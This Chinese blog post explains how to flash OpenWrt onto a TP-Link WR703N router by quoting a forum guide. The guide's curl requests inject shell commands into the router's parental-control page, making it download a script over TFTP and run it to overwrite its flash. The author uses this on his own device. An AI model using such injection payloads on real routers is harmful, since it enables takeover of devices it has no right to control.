我入手TP-Link 703n已经有很长时间了,其实我家里还有其他路由器,性能也比703N好,之所以买这个路由器,首先就是因为他很小巧,比手掌小,并且还能刷各种嵌入式Linux系统,网上对于703N的评价都还不错,都说是属于入门级别的,好在价格也比较便宜,所以我就入了。

但是这个路由器一出厂就是刷的最新版官方系统,像我这种折腾的,怎么可能止步于此?网上查了下TP-Link 703n V1.7以上版本不能直接刷OpenWrt,除非用编程器,整个人都不好了,刚刚买来的东西,我可不想动电烙铁。就在我在谷歌上面找时看见了一篇文章,下面就是原文。

 

  • Upgrade your new WR703N V1.17.1 to openwrt.
  • WARNING: THIS CAN BRICK YOUR DEVICE. DO NOT RELY ON ANY OF THIS INFORMATION.
  • These are just hints how I did it.
  • If you have no experience with wr703n's. Just buy a MR3020.
  • You'll need:
  • * A FTP server (in my case 192.168.1.9, I advise to use the same IP or understand what the hell you're doing)
  • * An unix or mac workstation with curl (can be the same box)
  • * A general knowledge of unix commands.
  • * An openwrt image. I make my own but stock 12.09 might work.
  • * A binary busybox for mips static compiled.
  • The general idea:
  • * Put a script on your tp-link wr703n
  • * Put a better busybox on your tp-link wr703n
  • * Trick the wr703n into executing some commands to run this script.
  • The script:
  • * get the first en second part of the image from tftp
  • * flash the first part of the image (1024k) to the mtd partition named kernel
  • * flash the rest of the image (2819k) to the mtd partition named rootfs
  • * reboot the box with openwrt on it.
  • First setup the tftp server and put the following files there:
  • === file aa cut from here ======
  • cd /tmp
  • tftp -gl i1 192.168.1.9
  • tftp -gl i2 192.168.1.9
  • tftp -gl busybox 192.168.1.9
  • chmod 755 busybox
  • ./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync
  • ./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync
  • ./busybox reboot -f
  • echo blaaat
  • === /file aa cut to here =======
  • Put the rest also there:
  • * busybox
  • * openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin
  • Cut the openwrt image in 2 parts. (Yes these commands):
  • ??These commands can take a while since I had no interrest in calculating a better blocksize.
  • dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576
  • dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576
  • now there are 4 files in your TFTP directory: aa, busybox, i1, i2
  • Now let's take a router and have it set to the factory settings.
  • Run these commands on you're workstation.
  • # !!DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).!!
  • # First it wants a password set, let's do that. (the password is admin42 after this).
  • curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.1.1/'
  • # Secondly it wants to have parental control enabled (probably the once in a lifetime opportunity to use this).
  • curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'
  • # That being done, now all we need is to just simply exploit the router.
  • # readable it does:
  • # cd /tmp ; tftp -gl aa 192.168.1.9; sh aa
  • # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
  • curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'
  • # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
  • Just wait until it starts to blink, than openwrt is loading. Depending on your image you can reach it on it's mac address.
  • If you have no experience with wr703n's. Just buy a MR3020.

貌似是俄罗斯论坛的一篇文章,利用Web漏洞来给703N刷机,顿时整个人都好了。

把路由器恢复默认设置,就是用卡针戳下路由器上面的小洞10秒。

1.把电脑IP改为192.168.1.100

2.进入该目录,先运行tftp32

3.然后进入cmd命令行,进入该目录,键入命令

curl -o - -b "tLargeScreenP=1;subType=pcSub;Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D;ChgPwdSubTag=tru" "http://192.168.1.1/"

4.提示符出来后键入

curl -o - -b "tLargeScreenP=1;subType=pcSub;Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D;ChgPwdSubTag=" --referer "http://192.168.1.1/userRpm/ParentCtrlRpm.htm" "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1"

5.提示符出来后键入

curl -o - -b "tLargeScreenP=1;subType=pcSub;Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D;ChgPwdSubTag=" --referer "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1" "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.100;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6"

耐心等待3分钟就刷好了。
刷好后没配置的时候只能lan连接。

刷OpenWrt到这里就成功了,事实上最后我还是用的编程夹。

Screenshot_2016-02-14-13-59-35-101